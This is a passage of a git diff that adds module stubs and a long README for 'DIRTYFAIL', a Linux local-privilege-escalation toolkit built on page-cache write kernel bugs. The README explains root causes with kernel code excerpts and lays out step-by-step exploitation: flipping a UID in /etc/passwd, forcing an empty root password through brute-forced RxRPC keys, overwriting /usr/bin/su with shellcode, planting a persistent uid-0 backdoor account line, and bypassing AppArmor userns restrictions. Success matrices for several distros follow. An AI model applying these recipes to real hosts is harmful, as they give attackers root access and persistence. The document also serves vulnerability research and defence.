 Lets other modules `#include "core/entrybleed.h"` and call + `entrybleed_leak_kbase()` when they need KASLR defeat +2. Ships defensive detection rules for prefetchnta-timing-attack + patterns (useful for hardened environments) +3. Documents the technique with a clear writeup so users + understand what "stage-1" means in the broader chain + +## Empirical status on recent kernels + +Verified 2026-05-16: works 5/5 on lts-6.12.88 (no anti-EntryBleed +mitigation configured). See +`security-research/findings/audit_io_uring_2026-05-16_poc_attempt.md` +and the EntryBleed test code at +`SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` lines ~73-150. + +## Upstream patches + +There is no single canonical patch. Partial mitigations include: +- `CONFIG_RANDOMIZE_KSTACK_OFFSET` (per-syscall kernel stack jitter) +- Some KPTI hardening discussions on lkml, no merged fix as of + lts-6.12.88 +- The community position remains that "KASLR is best-effort, + not a security boundary" + +## Implementation plan + +- Lift the proven EntryBleed code from + `SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` into + `module.c` here +- Expose as both a CLI mode (`iamroot --leak-kbase`) and as a + library helper (`uint64_t entrybleed_leak_kbase(void)`) +- Detection rules: timing-attack pattern flags, perf-counter + anomaly detection (informational — these are hard to make precise + without false positives) + +## Not started yet + +Phase 3. diff --git a/modules/_stubs/fragnesia_TBD/MODULE.md b/modules/_stubs/fragnesia_TBD/MODULE.md new file mode 100644 index 0000000..16f71b4 --- /dev/null +++ b/modules/_stubs/fragnesia_TBD/MODULE.md @@ -0,0 +1,27 @@ +# Fragnesia — CVE pending + +> ⚪ **PLANNED** stub. See [`../../../ROADMAP.md`](../../../ROADMAP.md) +> Phase 7+. + +## Summary + +ESP shared-frag in-place encrypt path can be coerced into writing +into the page cache of an unrelated file. Same primitive shape as +Dirty Frag, different reach. + +## Status + +Audit-stage. 
See +`security-research/findings/audit_leak_write_modprobe_backups_2026-05-16.md` +section on backup primitives. Notably: trigger appears to require +CAP_NET_ADMIN inside a userns netns. On kCTF (shared net_ns) that's +cap-dead, but on host systems where user_ns clone is enabled it's +reachable. + +## Decision needed before implementing + +Is the unprivileged-userns-netns scenario in scope for IAMROOT? If +yes, this module ships. If we restrict to "default Linux user +account, no namespace tricks," this module is out of scope. + +## Not started. diff --git a/modules/copy_fail_family/MODULE.md b/modules/copy_fail_family/MODULE.md new file mode 100644 index 0000000..7045c59 --- /dev/null +++ b/modules/copy_fail_family/MODULE.md @@ -0,0 +1,1243 @@ +# DIRTYFAIL + +> A unified detector and PoC harness for the **Copy Fail** and **Dirty Frag** +> Linux page-cache write vulnerability families. + +``` + β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— + β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— + β•šβ•β•β•β•β•β• β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β•β•β•β•β•β• +``` + +DIRTYFAIL is a small, well-documented C tool for security researchers. 
+It detects whether a Linux host is vulnerable to the three CVEs in this +family, and β€” with explicit, typed confirmation β€” runs a real +proof-of-concept that drops the caller into a root shell on a +vulnerable system. + +| CVE / variant | Name | DIRTYFAIL coverage | +|---|---|---| +| **CVE-2026-31431** | Copy Fail (algif_aead `authencesn` page-cache write) | Detect + full PoC | +| **CVE-2026-43284 v4** | Dirty Frag β€” IPv4 xfrm-ESP page-cache write | Detect + full PoC | +| **CVE-2026-43284 v6** | Dirty Frag β€” IPv6 xfrm-ESP page-cache write (`esp6`) | Detect + full PoC | +| **CVE-2026-43500** | Dirty Frag β€” RxRPC page-cache write | Detect + full PoC | +| Copy Fail GCM variant | xfrm-ESP `rfc4106(gcm(aes))` page-cache write | Detect + full PoC | + +**Bonus modes:** + +- **`--scan --active`** β€” sentinel-STORE active probes. Default `--scan` + reports per-CVE preconditions (kernel, modules, LSM state) plus an + active probe of the Copy Fail primitive. Adding `--active` extends + the sentinel-file STORE probe to all four other primitives (ESP v4, + ESP v6, RxRPC, GCM): each fires the kernel trigger against a `/tmp` + sentinel and reports VULNERABLE only if the marker bytes actually + land. This is the only way to distinguish a backported-patched + kernel (preconds say vulnerable but probe says intact) from an + unpatched one without running the full exploit. `/etc/passwd` is + never touched. Auto-calibrates V6 STORE shift per kernel build. +- **`--exploit-backdoor`** β€” persistent uid-0 backdoor: length-matched + overwrite of a `nologin`/`false`/`sync` line in `/etc/passwd` with + `dirtyfail::0:0::/:/bin/bash`. Survives shell exit until page + is evicted. State stashed at `/var/tmp/.dirtyfail.state` for + `--cleanup-backdoor`. The `dirtyfail` username is deliberately + matched to this project so it's instantly identifiable in any + audit β€” change `NEW_USER` in `src/backdoor.c` if you need a + different identifier for an authorized red-team engagement. 
+- **AppArmor bypass** β€” defeats Ubuntu's + `apparmor_restrict_unprivileged_userns=1` policy via a single-hop + `change_onexec("crun")` re-exec into an unconfined profile that + retains userns capabilities. Each exploit mode handles this + internally via a fork: parent stays in init namespace, child does + the bypass dance, parent reads global page cache and runs `su` for + REAL init-ns root. The legacy `--aa-bypass` flag still exists for + debugging the bypass mechanics in isolation. See [Β§8.5 Architecture](#85-architecture-outerinner-fork-based-bypass). + +## Verified working on + +DIRTYFAIL has been **empirically validated end-to-end** across multiple +distros and kernel versions. The matrix below reflects per-mode test +results from running each `--exploit-*` mode against a fresh install +of each distro. + +| Distro | Kernel | LSM | Copy Fail | xfrm-ESP v4 | xfrm-ESP v6 | RxRPC | GCM | Backdoor | SU shellcode | +|---|---|---|:-:|:-:|:-:|:-:|:-:|:-:|:-:| +| Ubuntu 24.04 LTS | `6.8.0-111-generic` | AppArmor | πŸ›‘Β² | βœ… | βœ… | βœ… | βœ…ΒΉ | βœ…ΒΉ | (not tested) | +| Debian 13.4 | `6.12.86+deb13` | none | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘β΅ | +| AlmaLinux 10.1 | `6.12.0-124.8.1.el10_1` | SELinux | βœ… | βœ… | βœ… | ⏭³ | βœ… | βœ… | βœ… | +| Fedora 44 (Server) | `6.19.10-300.fc44` | SELinux | βœ… | βœ… | βœ… | βœ… | βœ… | βœ… | βœ… | +| Ubuntu 26.04 LTS | `7.0.0-15-generic` | AppArmor (hardened) | πŸ›‘ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΅ | + +**Legend:** βœ… exploit landed and produced real init-ns root Β· πŸ›‘ mitigated β€” exploit cannot reach kernel bug (kernel patched OR LSM blocks unprivileged path) Β· ⏭ not applicable (precondition missing) + +### Active-probe validation (`--scan --active`) + +The `--active` flag adds a sentinel-file STORE probe per CVE during +detection. 
We validated the probe outputs against four of the distros +above (Debian, Fedora, AlmaLinux, Ubuntu 26.04) — the matrix below +shows the per-mode probe verdict and matches the full-exploit +ground-truth one-for-one: + +| Distro | Copy Fail probe | ESP v4 probe | ESP v6 probe | RxRPC probe | GCM probe | +|---|:-:|:-:|:-:|:-:|:-:| +| Debian 13.4 | intact 🛑 | intact 🛑 | intact 🛑 | intact 🛑 | intact 🛑 | +| Fedora 44 | marker @0 ✅ | STORE @0 ✅ | STORE @8 ✅ | byte change ✅ | sentinel[0] 0x41→0x27 ✅ | +| AlmaLinux 10.1 | marker @0 ✅ | STORE @0 ✅ | STORE @8 ✅ | preconds ⏭ | sentinel changed ✅ | +| Ubuntu 26.04 | intact 🛑 | LSM-blocked 🛑 | LSM-blocked 🛑 | LSM-blocked 🛑 | LSM-blocked 🛑 | + +The V6 probe's STORE landing offset (8 on Fedora and Alma) matches the +empirical `V6_STORE_SHIFT` that `calibrate_v6_shift()` discovers at +runtime — confirming the auto-calibration replaces the previously +hard-coded constant correctly across kernel builds. + +¹ GCM and Backdoor require `algif_aead` to be loadable. Ubuntu 24.04 +ships `/etc/modprobe.d/disable-algif_aead.conf` blacklisting it as a +Copy Fail mitigation. With the blacklist removed (e.g. on a kernel +predating the mitigation), both modes work end-to-end. + +² Copy Fail's algif_aead path is mitigated by the modprobe blacklist; +the underlying CVE primitive in the kernel is still present whether or not +`authencesn` is reachable. xfrm-ESP, RxRPC, and the GCM variant all +land on the same kernel because they don't go through algif_aead. + +³ AlmaLinux 10's `kernel-modules-extra` package is not installed by +default on a Minimal install, so `rxrpc.ko` is missing on disk. +Installing `kernel-modules-extra-$(uname -r)` from EPEL or the AlmaLinux +extras repo brings the module back; on a stock minimal install RxRPC is +unreachable.
+ +⁴ **Ubuntu 26.04 LTS comprehensively blocks unprivileged exploitation.** +The shipping kernel `7.0.0-15.15` (released 2026-04-22) **predates the +mainline patch `f4c50a4034e6` (merged 2026-05-07) by ~2 weeks** — so +the bug IS still present in the kernel. Ubuntu's defense is +**defense-in-depth via AppArmor hardening**, not a kernel patch: + +- `apparmor_restrict_unprivileged_userns=1` is enabled by default. +- On `unshare(CLONE_NEWUSER)`, the kernel-level AppArmor enforcement + auto-transitions ANY profile (including `(unconfined)`-flagged ones + like `crun`, `chrome`, default `unconfined`) to a + `//&unprivileged_userns (mixed)` sub-profile that has + `audit deny capability`. uid 0 inside the new userns gets no caps. +- `change_onexec` to a different profile doesn't help — even the + `crun` profile (which has explicit `userns,` permission and + `flags=(unconfined)`) auto-transitions on unshare. Verified via + `aa-exec -p crun bash -c 'unshare -U -n cat /proc/self/attr/current'` + → `crun//&unprivileged_userns (mixed)`. +- `newuidmap`/`newgidmap` (setuid root) successfully writes uid_map, + but `setresuid(0)` then succeeds while `ioctl(SIOCSIFFLAGS)` and + every other CAP_NET_ADMIN-gated syscall returns EPERM because the + capability denial is per-namespace, not per-uid. + +The DIRTYFAIL binary correctly arms its bypass and reaches stage 2, +but cannot acquire CAP_NET_ADMIN inside the new userns. The exploit +infrastructure is blocked at the LSM layer regardless of bypass +technique. We tested `change_onexec(crun)`, `change_onexec(chrome)`, +`aa-exec -p `, and direct `unshare(USER|NET) + newuidmap` +— all produce the same `unprivileged_userns` sub-profile. + +**This is good security work by Canonical.** The bug class is +mitigated for unprivileged users without requiring a kernel rebuild. +A subsequent stable update will likely also bring the kernel patch +proper, completing the defense.
+ +⁡ **`--exploit-su` shellcode injection** depends on the same Copy Fail +algif_aead 4-byte primitive (`cf_4byte_write`). On kernels where +Copy Fail is patched (Debian 13.4) or LSM-blocked (Ubuntu 26.04 β€” but +the algif_aead path was also patched in 7.0.0-15), the plant runs +through but the verify step fails ("page cache does not match planted +shellcode") and the auto-revert restores `/usr/bin/su`. Tested +end-to-end on AlmaLinux 10.1 (entry point at file offset `0x45b0`) +and Fedora 44 (offset `0x1b60`); ELF parser handles each distro's +PIE base independently. Real-root proof on Fedora 44: +`uid=0(root) gid=0(root) ... context=unconfined_u:unconfined_r:unconfined_t`. + +Test reproducibility: + +- We re-installed each distro from a clean ISO, set up SSH key auth + NOPASSWD sudo, cloned and built DIRTYFAIL on each, took a `clean-build` Parallels snapshot, then ran all 5 exploit modes with `--no-shell` (auto-revert via fadvise + drop_caches). +- Empirical result rows are derived from parsing the actual `--exploit-*` output, looking for the success signals: `page cache now reports with uid 0`, `root password field is now empty`, `is now uid 0` (backdoor), or any of the failure patterns (`write did not land`, `byte flip failed`, `setresuid: Invalid`, `add_rxrpc_key: No such device`, `page cache not in expected shape`). +- For the RxRPC and Backdoor "real root" verification we drove `echo "" | su - root` / `echo "" | su - dirtyfail` and confirmed `uid=0(root)` plus successful read of `/etc/shadow`. + +> **Authorized testing only.** Use DIRTYFAIL only on systems you own or +> are explicitly engaged to assess. The exploit modes corrupt +> `/etc/passwd` *in the kernel page cache* (the on-disk file is never +> touched). Cleanup is `dirtyfail --cleanup` or +> `echo 3 > /proc/sys/vm/drop_caches`. + +--- + +## Table of contents + +1. [The bug class](#1-the-bug-class) +2. [CVE-2026-31431 β€” Copy Fail](#2-cve-2026-31431--copy-fail) +3. 
[CVE-2026-43284 β€” Dirty Frag (xfrm-ESP)](#3-cve-2026-43284--dirty-frag-xfrm-esp) +4. [CVE-2026-43500 β€” Dirty Frag (RxRPC)](#4-cve-2026-43500--dirty-frag-rxrpc) + - [4.5 Architecture overview](#45-architecture-overview) +5. [Build](#5-build) +6. [Usage](#6-usage) +7. [How DIRTYFAIL detects each CVE](#7-how-dirtyfail-detects-each-cve) +8. [How DIRTYFAIL exploits each CVE](#8-how-dirtyfail-exploits-each-cve) + - [8.5 Architecture: outer/inner fork-based bypass](#85-architecture-outerinner-fork-based-bypass) +9. [Mitigations](#9-mitigations) +10. [Ethics & disclosure](#10-ethics--disclosure) +11. [Credits](#11-credits) + +**Companion docs:** +- [`docs/DEFENDERS.md`](docs/DEFENDERS.md) β€” sysadmin playbook: am I vulnerable, how to mitigate, what to monitor. +- [`docs/RESEARCH.md`](docs/RESEARCH.md) β€” kernel-source audit of adjacent paths (AH, IPCOMP, MACsec, kTLS, etc.) for the same bug class. +- [`tools/dirtyfail-check.sh`](tools/dirtyfail-check.sh) β€” standalone bash detector for sysadmins (no compilation needed). +- [`tools/99-dirtyfail.rules`](tools/99-dirtyfail.rules) β€” ready-to-load auditd rules for the exploit chain. +- [`tools/dirtyfail-container-escape.sh`](tools/dirtyfail-container-escape.sh) β€” cross-namespace blast-radius demo. +- [`tools/exploit_su_aarch64.S`](tools/exploit_su_aarch64.S) β€” aarch64 (ARM64) shellcode source for `--exploit-su`. Hardware-untested; ships gated behind `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1`. Regenerate the corresponding bytes in `src/exploit_su.c` with `aarch64-linux-gnu-as` to verify. + +--- + +## 1. The bug class + +**Page-cache write** vulnerabilities let an unprivileged user modify +the kernel's in-memory copy of a file they only have read access to. +The on-disk file is never written; the modification persists in RAM +until the page is evicted (`drop_caches`, memory pressure, or reboot). + +This class started with **Dirty Pipe** (CVE-2022-0847), which abused +`pipe_buffer` flags. 
Copy Fail and Dirty Frag are descendants that +target the `frag` member of `struct sk_buff` instead. The mechanism is +always the same: + +1. Userspace `splice()`s a page-cache page from a readable file (e.g. + `/etc/passwd`, `/usr/bin/su`) into the frag of a kernel buffer. +2. A receive path runs **in-place** crypto on that buffer β€” the same + pages are both source and destination of the operation. +3. The crypto routine performs a "scratch" STORE outside the data + region (a sequence-number rearrangement, a single-block decrypt, + etc.) that lands inside the user-pinned page. +4. The page-cache copy of the file is now permanently modified for + every reader on the host, until the page is evicted. + +Because the bug is a **deterministic logic flaw**, not a race, success +rates are essentially 100% and the kernel does not panic on failure. + +--- + +## 2. CVE-2026-31431 β€” Copy Fail + +* Disclosure: **2026-04-29** +* Site: +* Original PoC (C): [Smarttfoxx/copyfail](https://github.com/Smarttfoxx/copyfail) +* Original PoC (Python): [rootsecdev/cve_2026_31431](https://github.com/rootsecdev/cve_2026_31431) +* Introduced by commit: `72548b093ee3` (2017) +* Fixed by commit: `a664bf3d` (mainline 6.12 / 6.17 / 6.18 stables) +* Confirmed affected: Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 14.3, SUSE 16 + +### Root cause + +The kernel's `algif_aead` module exposes the AEAD crypto API to +userspace via `AF_ALG`. The `authencesn(hmac(sha256), cbc(aes))` +template implements RFC-4303 ESN (Extended Sequence Numbers); part of +its decryption path performs a **4-byte scratch write** to rearrange +the sequence number: + +```c +static int crypto_authenc_esn_decrypt(struct aead_request *req) +{ + /* Move high-order bits of sequence number to the end. */ + scatterwalk_map_and_copy(tmp, src, 0, 8, 0); + if (src == dst) { + scatterwalk_map_and_copy(tmp, dst, 4, 4, 1); + scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); // β˜… + ... 
+``` + +The STORE at β˜… is harmless on a normal IPsec packet β€” it lands inside +the skb's tag area, which is kernel-owned. The crypto template +**assumes** `src` and `dst` point into kernel memory. + +`algif_aead` violates that assumption. It accepts `splice()` from +userspace, which plants page-cache pages into the request's +scatterlist. Because the AEAD runs in-place (`req->dst = req->src`), +the page-cache page now sits at the destination scatterlist offset +that the scratch write targets. + +The 4 bytes that get written are bytes 4..7 of the AAD that userspace +sent β€” the "seqno_lo" field of an ESP header, which the attacker fills +with whatever they want. + +**Net primitive**: 4-byte arbitrary-offset write into the page cache +of any file the attacker can `open(O_RDONLY)`. + +### Exploitation + +The simplest weaponization is in `/etc/passwd`. A normal user line +looks like: + +``` +kara:x:1000:1000:Kara,,,:/home/kara:/bin/bash +``` + +Flipping `1000` (the UID field, exactly 4 ASCII bytes for any UID +1000–9999) to `0000` makes glibc's `getpwnam()` report uid=0 for +that user. PAM, however, still authenticates against the on-disk +`/etc/shadow` (which is untouched), so `su ` prompts for the +real password, validates it, then `setuid(0)` β€” and lands at root +because the page-cache copy of `/etc/passwd` says we are root. + +`/etc/shadow` integrity is preserved. On-disk `/etc/passwd` is +preserved. Only the kernel's RAM copy of `/etc/passwd` is corrupted, +and only until `drop_caches` or reboot. + +--- + +## 3. 
CVE-2026-43284 β€” Dirty Frag (xfrm-ESP) + +* Disclosure: **2026-04-30 β†’ 2026-05-08** +* Original PoC (C): [V4bel/dirtyfrag](https://github.com/V4bel/dirtyfrag) +* Researcher: Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) +* Introduced by commit: `cac2661c53f3` (2017-01-17) +* Fixed by commit: `f4c50a4034e6` (mainline net.git, merged 2026-05-07) +* Confirmed affected: Ubuntu 24.04, RHEL 10.1, openSUSE Tumbleweed, + CentOS Stream 10, AlmaLinux 10, Fedora 44 + +### Root cause + +`esp_input()` is supposed to call `skb_cow_data()` before in-place AEAD +decryption when an skb is non-linear (i.e. has frags). The code path +has a short-circuit: + +```c +if (!skb_cloned(skb)) { + if (!skb_is_nonlinear(skb)) { + nfrags = 1; + goto skip_cow; + } else if (!skb_has_frag_list(skb)) { // β˜… bug + nfrags = skb_shinfo(skb)->nr_frags; + nfrags++; + goto skip_cow; + } +} +``` + +If the skb has frags but no `frag_list`, esp_input bypasses +`skb_cow_data` and hands the user-supplied frag straight to the AEAD +template. The same `authencesn(...)` scratch write that powers Copy +Fail then lands at file offset `(assoclen + cryptlen)` of the spliced +page. + +The 4 STOREd bytes are `seq_hi` from the SA's `replay_esn` state β€” +attacker-controlled at SA registration time via the +`XFRMA_REPLAY_ESN_VAL` netlink attribute. + +**Cost**: registering an XFRM SA needs `CAP_NET_ADMIN`, so the +attacker enters a fresh user namespace via `unshare(CLONE_NEWUSER)` +first. This is allowed by default on most distros (Ubuntu's hardened +profile is the notable exception). + +**Crucially, this primitive works even when the algif_aead Copy Fail +mitigation is in place** β€” the xfrm path doesn't go through algif_aead. +A defender who only blacklisted `algif_aead` is still vulnerable to +Dirty Frag. + +### Exploitation + +V4bel's published PoC writes a 192-byte static "root-shell" ELF over +the first 192 bytes of `/usr/bin/su`'s page cache, using 48 sequential +4-byte STOREs. 
After modification, `execve("/usr/bin/su")` runs the +new ELF entry point with the setuid-root bit intact, drops PAM +entirely, and `execve("/bin/sh")` from inside the shellcode. + +DIRTYFAIL takes the simpler `/etc/passwd` UID-flip approach (one +4-byte STORE β€” the same target as Copy Fail) for two reasons: + +1. It is a single-write primitive demonstration, easier to study. +2. It is fully reversible with `POSIX_FADV_DONTNEED` and does not + leave `/usr/bin/su` in a corrupt state for other users on the + system. + +--- + +## 4. CVE-2026-43500 β€” Dirty Frag (RxRPC) + +* Disclosure: **2026-04-29 β†’ 2026-05-08** +* Patch: not in any tree as of 2026-05-08; researcher's patch + pending: `lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/` +* Researcher: Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) +* Introduced by commit: `2dc334f1a63a` (2023-06) + +### Root cause + +`rxkad_verify_packet_1()` performs an **in-place** `pcbc(fcrypt)` +single-block decryption on the first 8 bytes of an RxRPC data packet: + +```c +sg_init_table(sg, ARRAY_SIZE(sg)); +ret = skb_to_sgvec(skb, sg, sp->offset, 8); +memset(&iv, 0, sizeof(iv)); +skcipher_request_set_crypt(req, sg, sg, 8, iv.x); // β˜… src == dst +ret = crypto_skcipher_decrypt(req); // β˜… 8-byte STORE +``` + +If a page-cache page has been spliced into the skb's frag, the 8-byte +decrypt is performed on top of it. + +**Difference from xfrm-ESP**: the 8 bytes that get STOREd are +`fcrypt_decrypt(C, K)`, where `C` is the existing ciphertext at that +file offset and `K` is the session key from an RxRPC v1 token the +attacker registered via `add_key("rxrpc", ...)`. The attacker doesn't +control the STORE value directly β€” they have to brute-force `K` until +`fcrypt_decrypt(C, K)` produces the desired plaintext. + +`fcrypt` is an Andrew File System cipher with a **56-bit key** and +8-byte block. 
It is deterministic; it ports cleanly to user space; and +its key space is small enough that a constrained 8-byte target can be +brute-forced in milliseconds to seconds depending on the constraint +budget. + +**Crucially, this path does NOT need namespace privileges** — +`add_key`, `socket(AF_RXRPC)`, `socket(AF_ALG)`, `splice` are all +available to any unprivileged user. RxRPC fills the gap on Ubuntu's +hardened-userns profile (where xfrm-ESP is blocked) because +`rxrpc.ko` ships in the default Ubuntu build. + +### Exploitation + +The full exploit: + +1. Brute-force `K_A`, `K_B`, `K_C` in user-space such that the three + STOREs at `/etc/passwd` offsets 4, 6, 8 produce + `"::"`, `"0:"`, `"0:GGGGG:"` respectively (last-write-wins). +2. For each `K_i`, register an RxRPC v1 token with `add_key`, perform + a forged AF_RXRPC handshake against a fake UDP server in the same + process, and trigger `rxkad_verify_packet_1` via splice. +3. The page-cache copy of `/etc/passwd` line 1 is now + `root::0:0:GGGGG:/root:/bin/bash` — an empty password field. +4. PAM with `pam_unix.so nullok` accepts the empty password; `su -` + drops a root shell. + +### DIRTYFAIL coverage + +DIRTYFAIL ships **both** detection and a full PoC for this CVE. + +The DIRTYFAIL implementation lives in `src/dirtyfrag_rxrpc.c` and +`src/fcrypt.c`: + +- **fcrypt cipher** (`fcrypt.c`): 56-bit key, 8-byte block, 16-round + Feistel; standard rxkad protocol S-boxes. Includes a single-core + brute-force harness (~18 Mops/s) that searches the key space until + a candidate plaintext satisfies a caller-supplied predicate. +- **rxkad checksum** (`compute_csum_iv`, `compute_cksum`): kernel + formula reproduced via AF_ALG `pcbc(fcrypt)` so that the wire cksum + in our forged DATA packet passes `rxkad_verify_packet`'s gate. +- **RxRPC v1 token build** (`build_rxrpc_v1_token`): XDR-encoded + rxkad token registered via `add_key("rxrpc", ...)` with our + brute-forced session key.
+- **AF_RXRPC client + UDP fake-server**: the client initiates a call, + the fake-server extracts (epoch, cid, callNumber) from the first + packet and emits a forged CHALLENGE so the client primes + `conn->rxkad.cipher` with our key. +- **Splice trigger** (`do_one_trigger`): vmsplice forged DATA wire + header β†’ splice 8 bytes from `/etc/passwd` β†’ splice pipe β†’ udp_srv + β†’ recvmsg drives kernel through `rxkad_verify_packet_1` β†’ 8-byte + STORE. +- **3-splice chain with chained-ciphertext correction**: brute force + K_A / K_B / K_C, applying the chained ciphertext shift between + passes (after splice A overwrites bytes 4..11, splice B's + ciphertext at 6..13 starts with `P_A[2..7]`; same for C against B). + +The final PoC reshapes `/etc/passwd` line 1 to: + +``` +root::0:0:GGGGG:/root:/bin/bash +``` + +β€” empty password field β€” and `execlp("su", "-")` then drops a root +shell because `pam_unix.so nullok` accepts an empty password. + +For comparison and verification against the upstream PoC, see +V4bel's `exp.c`: . + +--- + +## 4.5 Architecture overview + +DIRTYFAIL is a single C binary built from ~10 source modules. 
The +high-level structure: + +``` + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ dirtyfail (CLI) β”‚ + β”‚ src/dirtyfail.c β€” argv β†’ mode dispatch β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ + β–Ό β–Ό β–Ό β–Ό β–Ό β–Ό + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ --scan β”‚ β”‚ --exploit-* β”‚ β”‚ --backdoor β”‚ β”‚--mitigateβ”‚ β”‚ --cleanup* β”‚ + β”‚ (detect.c) β”‚ β”‚ (5 modes) β”‚ β”‚ install + β”‚ β”‚ defense β”‚ β”‚ revert β”‚ + β”‚ β”‚ β”‚ β”‚ β”‚ cleanup β”‚ β”‚ β”‚ β”‚ β”‚ + β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ β”‚ β”‚ β”‚ + β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ β”‚ β”‚ β”‚ + β–Ό β–Ό β–Ό β–Ό + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ apparmor_ β”‚ β”‚ outer (init ns) β”‚ β”‚ cfg_1byte_write β”‚ + β”‚ bypass.c β”‚ β”‚ β†’ fork β†’ child β”‚ β”‚ (gcm primitive) β”‚ + β”‚ β”‚ β”‚ outer/inner β”‚ β”‚ β”‚ + β”‚ * sysctl β”‚ β”‚ split β”‚ β”‚ used by gcm + β”‚ + β”‚ * caps_blocked β”‚ β”‚ 
